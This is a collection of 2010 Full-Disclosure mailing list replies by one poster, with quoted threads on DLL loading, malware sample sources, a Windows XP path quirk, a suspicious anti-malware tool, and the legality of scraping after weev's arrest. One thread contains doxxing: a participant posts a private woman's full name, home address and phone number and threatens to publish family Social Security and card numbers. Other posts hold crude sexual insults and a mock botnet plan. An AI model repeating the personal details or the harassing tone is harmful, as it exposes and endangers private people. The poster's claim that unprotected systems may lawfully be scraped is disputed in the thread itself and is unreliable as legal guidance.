> > mentioned cases where the bad dll (in CWD) would not be loaded (and an
> > error followed instead).
> >
> >> Consult MSDN on the DLL load order.
> >
> > I don't have to. If you spared one moment from trolling, you might
> > have noticed me dumping a list from ProcessMonitor...which clearly
> > shows what the dll loading order is.
> >
> >> BTW: Windows' "base directory" is MSFTs notion of $HOME.
> >> Use the right terms/words, PLEASE.
> >
> > Mind not putting words in my mouth? As far as definition goes, a "base
> > directory" is where the source program started from...
>
> Wrong. That's the "application directory".
>
> > that could be a docroot of an index.php file
>
> Wrong again. *.PHP is no executable file format, but associated to an
> application. See CMD.EXE /K ASSOC .PHP and then FTYPE with the output
> of the ASSOC.
>
> > or C:\Windows for notepad.exe.
> > No one said anything about Windows!
>
> ACROS showed a POC for Windows' address book using a *.VCF and a .DLL
> built for Windows.
>
> >> Ca

Re: [Full-disclosure] Virus submission site

[T Biehn]

You could setup a website that proxies submissions to virustotal, anubis (so
it's from the future) and retain the executables. Post this website to FD.

You could also deploy a botnet of your own and use them as honeypots then
jack the networks of the lower tier *ircbot fellows to expand your
'honeypot' network.

A good place to start building your "whitehat use honeypot/botnet" is
scraping dronebl, spambl and IP addresses posted to the IRC-Security mailing
list. (Archive helpfully provided for registered users.)

Once you have a sizable network set up you can start "baiting" scammers by
offering various services like selling proxy servers, providing bulletproof
hosting and spamming. You can use this supplemental income to quit your day
job and become a full-time vigilante whitehat.

Eventually you'll build a nice portfolio of clients, if any of them becomes
competitive you can just report their information to the appropriate
authorities, this would also be a nice side-channel of income to enable
further whitehat pursuits and make sure you stay firmly in the man's good
books.

-Travis

On Fri, Sep 3, 2010 at 12:25 PM, IndianZ  wrote:

> http://www.offensivecomputing.net/
> - not very structured, but actual stuff
> - registration required
>
> Cheerz IndianZ
>
> On 09/03/10 16:58, Christian Sciberras wrote:
> > Wish there was a reverse for thatI'm kinda getting tired of running
> > honeypots to get a hopefully recent malware.
> >
> >
> > vx-heavens has a nice (but outdated) list. Anyone knows about others?
> >
> >
> > Cheers,
> > Chris.
> >
> >
> > On Fri, Sep 3, 2010 at 4:48 PM, Hacxx 20  wrote:
> >
> >> Hi,
> >>
> >> Do you have virus archived? Submit them to all major antivirus
> companies.
> >>
> >> Visit http://virus-submission.tk
> >>
> >> ___
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >>
> >
> >
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows XP bug

[T Biehn]

This is fairly classic, not novel.
Your POC is fairly classic, not novel.

-Travis

On Wed, Jul 7, 2010 at 1:54 PM, BlackHawk  wrote:

> Hi list, i recently discovered a very small Windows XP bug, kind of
> useless alone but that could be usefull in some scenarios.
>
> Explanation:
>
> when you try to access a non existing directory though shell command
> "cd", XP returns an error (obviously), but if you cd to a non-existing
> & move one directory up, you'll not get any error.
>
> Example:
> ---
> C:\>cd ./somerandomchars <-- Will give an error
> Impossibile trovare il percorso specificato.
>
> C:\>cd ./somerandomchars/../ <-- Everything is ok
>
> C:\>
> ---
>
> PoC on how to make this thing usefull:
>
> http://www.scribd.com/doc/28080332/Podcast-Generator-1-3-Arbitrary-File-Download-Windows
>
> Hope this could be useful for you in some way..
>
> --
> BlackHawk - hawkgot...@gmail.com
>
> Sent with Gmail
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Congratulations Andrew

[T Biehn]

Ouch dude:
http://www.cbc.ca/canada/toronto/story/2010/06/23/tor-g20-arrest.html

Guess you ate a dick too.

On Wed, Jun 16, 2010 at 7:05 PM, Byron Sonne  wrote:

> > Looks like Andrew/weev/n3td3v finally gets to do what he likes the most
> > Performing fellatio on his fellow inmates
> > http://www.theregister.co.uk/2010/06/16/auernheimer_arrested/
>
> Oh man, pretty sweet! I've been waiting years to see weev eat a dick,
> and the time has come at last.
>
> Maybe there is a god.
>
> --
> Byron L. Sonne :: blso...@halvdan.com :: www.halvdan.com
> gpg: 0x69D9EAA6, C651 EF07 1298 58B3 615D 4019 E196 BAE1 69D9 EAA6
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] No anti-virus software? No internet connection

[T Biehn]

I wonder if someone writes down all that pseudo-intellectual philosophical
bullshit that is so carefully crafted by FD members (myself included)?
Maybe I should:
???
Profit

-Travis

On Thu, Jun 24, 2010 at 5:45 AM, Walter van Holst <
walter.van.ho...@xs4all.nl> wrote:

> On Thu, June 24, 2010 11:08, valdis.kletni...@vt.edu wrote:
>
> >> The answer to that kind of question is quite often related to the
> >> industry average. For example no more failures than one standard
> >> deviation below the industry average.
> >
> > Ahh.. but that doesn't really help either.  Consider that not all
> > failures
> > are created equal.  Should a failure to detect some unknown basically
> > harmless
> > strain that's only been seen on 4 machines in Zimbabwe count the same
> > as
> > failing to notice that a machine is still infected with Code Red or
> > something
> > that's virulent and malicious and on a very large current burn?  Do
> > you even
> > care it didn't detect the Zimbabwe strain your machine has never been
> > exposed to?
>
> Of course any way of measuring it will be fundamentally flawed in
> certain ways. There is always that pesky 80/20 or 90/10 rule. And you
> can of course figure out a way of correcting for corner cases, but
> that will only create additional corner cases. That's what makes
> lawyering on product liability a craft at best and usually some form
> of black magic.
>
> > For that matter, do you really want to create a situation where the
> > various
> > A/V companies now have an *incentive* to make sure their competitors
> > don't
> > detect something (either by failing to share data, or resorting to
> > having
> > malware custom-crafted)?  The only reason the whole A/V industry
>
> And yes, there may very well be unintended consequences. Nonetheless,
> I feel the era of complete exoneration from product liability is
> coming to an end for packaged software. Especially in the security
> industry. It is just a matter of an 'unsafe at any speed' moment
> occurring and there will be legislation, however braindead such
> legislation may be from an engineering viewpoint.
>
> Call me a pessimist, but we've been putting way too much critical
> stuff on internet connected systems while at the same neglecting basic
> hygiene at every level not to have some disaster to happen. It isn't
> so much a question of if but when that will happen.
>
> Regards,
>
>  Walter
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Congratulations Andrew

[T Biehn]

Lets just call a spade a spade here:
AT&T got butthurt at the media ruin and forced the man to come down hard on
someone.
A perfect someone to restore public faith in the order of the world was
Weev.

So AT&Ts lawyers drafted some bum legal pretense under which to raid weev
looking for some related incriminating content and handed it off to the
cops. Of course they were going to find something illegal on his premises,
have you seen half the shit he writes online?

This is another instance of Corporate Policy leading to unjustified Policing
action; it is the second such occurrence in the past few months. Maybe AT&T
schooled Apple in mobile networking and in turn Apple schooled AT&T in
corporate control of public police forces.

-Travis

On Wed, Jun 16, 2010 at 4:12 PM, T Biehn  wrote:

> Furthermore if I access an online resource and I notice that the
> information ends and the URL has a &page=1 on the end and no link exists on
> that page to say... &page=2 is that illegal?
> On the same note, if I notice something that looks like a SELECT statement
> in a URL (due to excellent coding) is it illegal for me to modify that
> SELECT statement to return other information?
> Is the legality of access to the resource something that must be explicitly
> granted to me or is it some abstract property depending on the content I've
> accessed? Is it legal to randomly fuzz web service arguments without knowing
> the data that it will return?
>
> Usually systems of this nature will have an EXPLICIT notice that you cannot
> access data on it unless you're authorized OR will require (as it does now)
> authentication.
>
> Did the ICCID count as authentication if it is not explicitly labeled by
> AT&T as such? A field like:
> &password would clearly be illegal to brute force.
>
> An analogy to a case with CLEARLY AND EXPLICITLY defined law regarding
> private property doesn't really seem to fit.
>
> -Travis
>
>
>
> On Wed, Jun 16, 2010 at 3:58 PM, T Biehn  wrote:
>
>> So what grants you legal access to aol.com (HTTP port 80 get / )?
>> I'm confused? Does search engine indexing grant legal access to online
>> resources?
>>
>> -Travis
>>
>>
>> On Wed, Jun 16, 2010 at 3:34 PM, Thor (Hammer of God) <
>> t...@hammerofgod.com> wrote:
>>
>>> By the same logic, then yes you would.  Which is why the statement “if a
>>> system has no password, then you have a legal right to whatever data is on
>>> it” is complete horse hockey.
>>>
>>>
>>>
>>> Don’t take technical advice from your lawyer, and don’t take legal advice
>>> from people on security lists.
>>>
>>>
>>>
>>> t
>>>
>>>
>>>
>>> *From:* full-disclosure-boun...@lists.grok.org.uk [mailto:
>>> full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *wilder_jeff
>>> Wilder
>>> *Sent:* Wednesday, June 16, 2010 11:56 AM
>>> *To:* full-disclosure@lists.grok.org.uk
>>>
>>> *Subject:* Re: [Full-disclosure] Congratulations Andrew
>>>
>>>
>>>
>>>
>>> By that same standard.. if you leave your house unlocked does that
>>> give someone the right to enter it?
>>>
>>> just my thoughts
>>> --
>>>
>>> Date: Wed, 16 Jun 2010 19:58:27 +0200
>>> From: uuf6...@gmail.com
>>> To: tbi...@gmail.com
>>> CC: full-disclosure@lists.grok.org.uk; valdis.kletni...@vt.edu
>>> Subject: Re: [Full-disclosure] Congratulations Andrew
>>>
>>> Reminds be of Al Capone and tax evasion ;-)
>>>
>>> Good ol' America.
>>>
>>>
>>>
>>> On Wed, Jun 16, 2010 at 7:49 PM, T Biehn  wrote:
>>>
>>> Yes.
>>> The FBI was investigating the AT&T incident, presumably the AT&T incident
>>> was what the fed were serving against.
>>> What possible valid search warrant could be executed? There was no hack,
>>> breach, illegal access of data, or anything else for that matter.
>>>
>>> If you leave a system online with no password which allows you to scrape
>>> content you have a legal right to scrape that content.
>>>
>>> -Travis
>>>
>>>
>>>
>>> On Wed, Jun 16, 2010 at 11:10 AM,  wrote:
>>>
>>> On Wed, 16 Jun 2010 10:09:22 EDT, T Biehn said:
>>>
>>> > I doubt the search warrant will hold up in court.
>>>
>>> Do you have any actual basis for saying that?  Sure, the warrant might be
>>> bullshit, it

Re: [Full-disclosure] Congratulations Andrew

[T Biehn]

Furthermore if I access an online resource and I notice that the information
ends and the URL has a &page=1 on the end and no link exists on that page to
say... &page=2 is that illegal?
On the same note, if I notice something that looks like a SELECT statement
in a URL (due to excellent coding) is it illegal for me to modify that
SELECT statement to return other information?
Is the legality of access to the resource something that must be explicitly
granted to me or is it some abstract property depending on the content I've
accessed? Is it legal to randomly fuzz web service arguments without knowing
the data that it will return?

Usually systems of this nature will have an EXPLICIT notice that you cannot
access data on it unless you're authorized OR will require (as it does now)
authentication.

Did the ICCID count as authentication if it is not explicitly labeled by
AT&T as such? A field like:
&password would clearly be illegal to brute force.

An analogy to a case with CLEARLY AND EXPLICITLY defined law regarding
private property doesn't really seem to fit.

-Travis


On Wed, Jun 16, 2010 at 3:58 PM, T Biehn  wrote:

> So what grants you legal access to aol.com (HTTP port 80 get / )?
> I'm confused? Does search engine indexing grant legal access to online
> resources?
>
> -Travis
>
>
> On Wed, Jun 16, 2010 at 3:34 PM, Thor (Hammer of God) <
> t...@hammerofgod.com> wrote:
>
>> By the same logic, then yes you would.  Which is why the statement “if a
>> system has no password, then you have a legal right to whatever data is on
>> it” is complete horse hockey.
>>
>>
>>
>> Don’t take technical advice from your lawyer, and don’t take legal advice
>> from people on security lists.
>>
>>
>>
>> t
>>
>>
>>
>> *From:* full-disclosure-boun...@lists.grok.org.uk [mailto:
>> full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *wilder_jeff
>> Wilder
>> *Sent:* Wednesday, June 16, 2010 11:56 AM
>> *To:* full-disclosure@lists.grok.org.uk
>>
>> *Subject:* Re: [Full-disclosure] Congratulations Andrew
>>
>>
>>
>>
>> By that same standard.. if you leave your house unlocked does that
>> give someone the right to enter it?
>>
>> just my thoughts
>> --
>>
>> Date: Wed, 16 Jun 2010 19:58:27 +0200
>> From: uuf6...@gmail.com
>> To: tbi...@gmail.com
>> CC: full-disclosure@lists.grok.org.uk; valdis.kletni...@vt.edu
>> Subject: Re: [Full-disclosure] Congratulations Andrew
>>
>> Reminds be of Al Capone and tax evasion ;-)
>>
>> Good ol' America.
>>
>>
>>
>> On Wed, Jun 16, 2010 at 7:49 PM, T Biehn  wrote:
>>
>> Yes.
>> The FBI was investigating the AT&T incident, presumably the AT&T incident
>> was what the fed were serving against.
>> What possible valid search warrant could be executed? There was no hack,
>> breach, illegal access of data, or anything else for that matter.
>>
>> If you leave a system online with no password which allows you to scrape
>> content you have a legal right to scrape that content.
>>
>> -Travis
>>
>>
>>
>> On Wed, Jun 16, 2010 at 11:10 AM,  wrote:
>>
>> On Wed, 16 Jun 2010 10:09:22 EDT, T Biehn said:
>>
>> > I doubt the search warrant will hold up in court.
>>
>> Do you have any actual basis for saying that?  Sure, the warrant might be
>> bullshit, it might be solid - the article doesn't give us enough info
>> either
>> way to tell.
>>
>> "Auernheimer was also arrested in March for giving a false name to law
>> enforcement officers responding to a parking complaint."
>>
>> Sad.  The dude may have the intelligence to pull the hack, but not have
>> the
>> wisdom to not dig a hole deeper. Just man up and take the frikking parking
>> ticket. ;)
>>
>>
>>
>> --
>> FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
>> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
>> http://pastebin.com/f6fd606da
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>> --
>>
>> The New Busy is not the old busy. Search, chat and e-mail from your inbox.
>> Get 
>> started.<http://www.windowslive.com/campaign/thenewbusy?ocid=PID28326::T:WLMTAGL:ON:WL:en-US:WM_HMP:042010_3>
>>
>

Re: [Full-disclosure] Congratulations Andrew

[T Biehn]

So what grants you legal access to aol.com (HTTP port 80 get / )?
I'm confused? Does search engine indexing grant legal access to online
resources?

-Travis

On Wed, Jun 16, 2010 at 3:34 PM, Thor (Hammer of God)
wrote:

> By the same logic, then yes you would.  Which is why the statement “if a
> system has no password, then you have a legal right to whatever data is on
> it” is complete horse hockey.
>
>
>
> Don’t take technical advice from your lawyer, and don’t take legal advice
> from people on security lists.
>
>
>
> t
>
>
>
> *From:* full-disclosure-boun...@lists.grok.org.uk [mailto:
> full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *wilder_jeff
> Wilder
> *Sent:* Wednesday, June 16, 2010 11:56 AM
> *To:* full-disclosure@lists.grok.org.uk
>
> *Subject:* Re: [Full-disclosure] Congratulations Andrew
>
>
>
>
> By that same standard.. if you leave your house unlocked does that give
> someone the right to enter it?
>
> just my thoughts
> --
>
> Date: Wed, 16 Jun 2010 19:58:27 +0200
> From: uuf6...@gmail.com
> To: tbi...@gmail.com
> CC: full-disclosure@lists.grok.org.uk; valdis.kletni...@vt.edu
> Subject: Re: [Full-disclosure] Congratulations Andrew
>
> Reminds be of Al Capone and tax evasion ;-)
>
> Good ol' America.
>
>
>
> On Wed, Jun 16, 2010 at 7:49 PM, T Biehn  wrote:
>
> Yes.
> The FBI was investigating the AT&T incident, presumably the AT&T incident
> was what the fed were serving against.
> What possible valid search warrant could be executed? There was no hack,
> breach, illegal access of data, or anything else for that matter.
>
> If you leave a system online with no password which allows you to scrape
> content you have a legal right to scrape that content.
>
> -Travis
>
>
>
> On Wed, Jun 16, 2010 at 11:10 AM,  wrote:
>
> On Wed, 16 Jun 2010 10:09:22 EDT, T Biehn said:
>
> > I doubt the search warrant will hold up in court.
>
> Do you have any actual basis for saying that?  Sure, the warrant might be
> bullshit, it might be solid - the article doesn't give us enough info
> either
> way to tell.
>
> "Auernheimer was also arrested in March for giving a false name to law
> enforcement officers responding to a parking complaint."
>
> Sad.  The dude may have the intelligence to pull the hack, but not have the
> wisdom to not dig a hole deeper. Just man up and take the frikking parking
> ticket. ;)
>
>
>
> --
> FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
> http://pastebin.com/f6fd606da
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> --
>
> The New Busy is not the old busy. Search, chat and e-mail from your inbox. Get
> started.<http://www.windowslive.com/campaign/thenewbusy?ocid=PID28326::T:WLMTAGL:ON:WL:en-US:WM_HMP:042010_3>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Congratulations Andrew

[T Biehn]

Yes.
The FBI was investigating the AT&T incident, presumably the AT&T incident
was what the fed were serving against.
What possible valid search warrant could be executed? There was no hack,
breach, illegal access of data, or anything else for that matter.

If you leave a system online with no password which allows you to scrape
content you have a legal right to scrape that content.

-Travis

On Wed, Jun 16, 2010 at 11:10 AM,  wrote:

> On Wed, 16 Jun 2010 10:09:22 EDT, T Biehn said:
>
> > I doubt the search warrant will hold up in court.
>
> Do you have any actual basis for saying that?  Sure, the warrant might be
> bullshit, it might be solid - the article doesn't give us enough info
> either
> way to tell.
>
> "Auernheimer was also arrested in March for giving a false name to law
> enforcement officers responding to a parking complaint."
>
> Sad.  The dude may have the intelligence to pull the hack, but not have the
> wisdom to not dig a hole deeper. Just man up and take the frikking parking
> ticket. ;)
>
>


-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Congratulations Andrew

[T Biehn]

Didn't Philip K. Dick wrote about this sort of thing in Radio Free Albemuth?
I doubt the search warrant will hold up in court.

-Travis

On Wed, Jun 16, 2010 at 9:27 AM, Milan Berger <
m.ber...@project-mindstorm.net> wrote:

> > Looks like Andrew/weev/n3td3v finally gets to do what he likes the
> > most
> > Performing fellatio on his fellow inmates
> > http://www.theregister.co.uk/2010/06/16/auernheimer_arrested/
>
> looks to good to be true.
> Is the longlife FD really away? Would be great!
>
> --
> Kind Regards
>
> Milan Berger
> Project-Mindstorm Technical Engineer
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

[T Biehn]

So far so good.
You've been able to go from t biehn -> Travis Biehn -> Bomber Article
(parent's names, city, state, country) -> whitepages.com (Address and Phone
number) -> (not clear on your jump here, did you google their name or for
the address?) Real estate listings.
Now to pull the SS and CC #'s you're going to have to go the extra mile. I'd
enjoy seeing you pull our SS numbers, being that we're all Canadians.

-Travis

On Fri, Jun 11, 2010 at 1:50 PM, musnt live  wrote:

> On Fri, Jun 11, 2010 at 1:43 PM, T Biehn  wrote:
> > Maybe you can call twice and get both of them really upset?
> >
>
> Maybe I will. Would she let me sit on her bed?
>
> http://images.realogyfg.com/j/2/5/15907460/62A47ADD-C353-4F73-94FB-742937D88A0B-6.jpg
>
> Oh n00z all this information for on this little wannabe unabummer. Go
> play now with some explosives and fux0r yourself before I is posting
> your family's SS CC #'s rookie
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

[T Biehn]

Maybe you can call twice and get both of them really upset?

-Travis

On Fri, Jun 11, 2010 at 1:21 PM, musnt live  wrote:

> On Fri, Jun 11, 2010 at 1:06 PM, T Biehn  wrote:
> > Totally, I'd work on getting a dog too.
> >
> > On Jun 11, 2010 12:20 PM, "musnt live"  wrote:
> >
> > On Fri, Jun 11, 2010 at 12:03 PM, T Biehn  wrote:
> >> It's a good thing I ran that a...
> >
> > It's a good thing there is to be a local bomb squad near me.
> >
> > http://www.cbc.ca/world/story/2005/06/13/canadian-bomb050613.html
> >
>
> Is Annette (your mom) available? A call to her could always have her
> be answer for herself:
>
> Annette Biehn (former known to be Annette Penney)
> 3395 Gail Circle
> Doylestown, PA  18901
> (215) 794-9220
>
> Or maybe so your dad Brant to be upset
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

[T Biehn]

Totally, I'd work on getting a dog too.

On Jun 11, 2010 12:20 PM, "musnt live"  wrote:

On Fri, Jun 11, 2010 at 12:03 PM, T Biehn  wrote:
> It's a good thing I ran that a...
It's a good thing there is to be a local bomb squad near me.

http://www.cbc.ca/world/story/2005/06/13/canadian-bomb050613.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

[T Biehn]

It's a good thing I ran that anti-hacker script!!!

On Fri, Jun 11, 2010 at 11:28 AM, Benji  wrote:

> because when she gets 0wn3d she can be all like 'ruh roh, well, 0day
> can happen to anyone'
>
> On Fri, Jun 11, 2010 at 4:01 PM, Benjamin Franz 
> wrote:
> > On 06/11/2010 02:40 AM, Christian Sciberras wrote:
> >> In my humble opinion, he could have waited a couple more days just in
> >> case Microsoft decided to do the unprecedented.
> >> In which case, I progressive change of policies at Microsoft are
> >> better than a couple of users getting hacked from pron sites...
> > As I said: Travis indicated in his original post he believes the exploit
> > *was already being used in the wild*. So NOT releasing it wouldn't
> > protect users. It would just keep it "secret" from everyone except
> > Microsoft *and the black hats who were already using it*. While
> > maintaining a false air of intact security for everyone else.
> >
> > That is better, how?
> >
> > --
> > Benjamin Franz
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Hacxx Anti Malware for Windows XP

[T Biehn]

I installed it too, and then I noticed a few other websites that were asking
me for activex privileges as well so I accepted their anti-malware. Now I'm
unhackable.

-Travis

On Mon, Jun 7, 2010 at 4:32 PM, Christian Sciberras wrote:

> Im new to computers, what is wrong with antimalware programs?
>
>
> And you're subscribed to this list? You don't install anything anyone
> throws around, especially when not from a trusted source...
>
>
>
>
>
> On Mon, Jun 7, 2010 at 10:31 PM, Benji  wrote:
>
>> Im new to computers, what is wrong with antimalware programs?
>>
>> On Mon, Jun 7, 2010 at 9:28 PM, Christian Sciberras 
>> wrote:
>> > Uhm...just clear those registry entries?
>> >
>> >
>> >
>> > Don't tell me you *did* install it? ;)
>> >
>> > You know what they say about cats and curiosity
>> >
>> >
>> >
>> >
>> > On Mon, Jun 7, 2010 at 10:23 PM, Benji  wrote:
>> >>
>> >> on an unrelated note, would anyone know how to uninstall this?
>> >>
>> >> thx intentrnets.
>> >>
>> >> On Mon, Jun 7, 2010 at 4:27 PM, T Biehn  wrote:
>> >> > Actually,
>> >> > The code is clean (Yes I looked), other than him setting his website
>> as
>> >> > the
>> >> > search provider for IE.
>> >> >
>> >> > -Travis
>> >> >
>> >> > On Mon, Jun 7, 2010 at 10:49 AM,  wrote:
>> >> >>
>> >> >> All it takes is one. Same with the email spamming crap
>> >> >>
>> >> >>
>> >> >> Sent on the Sprint® Now Network from my BlackBerry®
>> >> >>
>> >> >> -Original Message-
>> >> >> From: netinfinity 
>> >> >> Date: Mon, 7 Jun 2010 16:17:28
>> >> >> To: 
>> >> >> Subject: Re: [Full-disclosure] Hacxx Anti Malware for Windows XP
>> >> >>
>> >> >> ___
>> >> >> Full-Disclosure - We believe in it.
>> >> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> >> >> Hosted and sponsored by Secunia - http://secunia.com/
>> >> >> ___
>> >> >> Full-Disclosure - We believe in it.
>> >> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> >> >> Hosted and sponsored by Secunia - http://secunia.com/
>> >> >
>> >> >
>> >> >
>> >> > --
>> >> > FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
>> >> >
>> >> >
>> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
>> >> > http://pastebin.com/f6fd606da
>> >> >
>> >> > ___
>> >> > Full-Disclosure - We believe in it.
>> >> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> >> > Hosted and sponsored by Secunia - http://secunia.com/
>> >> >
>> >>
>> >> ___
>> >> Full-Disclosure - We believe in it.
>> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> >> Hosted and sponsored by Secunia - http://secunia.com/
>> >
>> >
>>
>
>


-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Hacxx Anti Malware for Windows XP

[T Biehn]

Actually,
The code is clean (Yes I looked), other than him setting his website as the
search provider for IE.

-Travis

On Mon, Jun 7, 2010 at 10:49 AM,  wrote:

> All it takes is one. Same with the email spamming crap
>
>
> Sent on the Sprint® Now Network from my BlackBerry®
>
> -Original Message-
> From: netinfinity 
> Date: Mon, 7 Jun 2010 16:17:28
> To: 
> Subject: Re: [Full-disclosure] Hacxx Anti Malware for Windows XP
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Hacxx Anti Malware for Windows XP

[T Biehn]

What the fuck.

On Mon, Jun 7, 2010 at 7:52 AM, hacxx20  wrote:

> Hi,
>
> I have been developing a tool in batch to block general malware for
